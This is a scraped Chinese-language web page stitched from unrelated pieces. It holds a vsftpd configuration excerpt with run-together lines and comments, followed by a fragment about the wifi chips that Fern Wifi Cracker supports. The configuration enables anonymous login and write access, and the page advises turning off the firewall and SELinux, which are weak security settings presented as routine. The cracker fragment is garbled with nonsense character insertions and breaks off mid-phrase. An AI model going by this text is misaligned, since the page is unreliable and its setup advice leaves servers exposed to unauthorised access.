# Allow anonymous FTP? (Beware - allowed by default if you comment this out).anonymous_enable=YES #允許匿名用戶登陸## Uncomment this to allow local users to log in.# When SELinux is enforcing check for SE bool ftp_home_dirlocal_enable=YES #允許本地用戶登陸## Uncomment this to enable any form of FTP write command.write_enable=YES #允許本地用戶讀寫## Default umask for local users is 077. You may wish to change this to 022,# if your users expect that (022 is used by most other ftpd's)local_umask=022 #本地用戶創建文件的umask值......
dirmessage_enable=YES #當用戶進入某個目錄時，會顯示該目錄需要注意的內容是 messagexferlog_enable=YES #啟動維護記錄伺服器上傳和下載情況的日誌文件connect_from_port_20=YES #FTP PORT主動模式進行數據傳輸時使用20埠xferlog_std_format=YES #傳輸日誌文件將以標准 xferlog 的格式書寫listen_ipv6=YES #監聽ipv6pam_service_name=vsftpd #pam認證模塊的名字userlist_enable=YES #拒絕登陸ftp的名單tcp_wrappers=YES #限制IP訪問vsftpd

匿名用戶認證

我們剛才已經開啟了vsftpd 我們已經可以登陸ftp站點 #需關閉防火牆或設置規則 並關閉selinux

⑩ fern支持什麼wifi晶元

支持WPSwifi晶元。Fern Wifi Cracker是一種無線安全審計和攻擊軟體編寫的程序，使用Python編程語言和判前Python的Qt圖形界面庫，該程序轎槐是能夠破解和恢復WEP、WPA、WPS鍵和無線或乙太網上運行其他基於網路的掘帆清攻擊基於網路的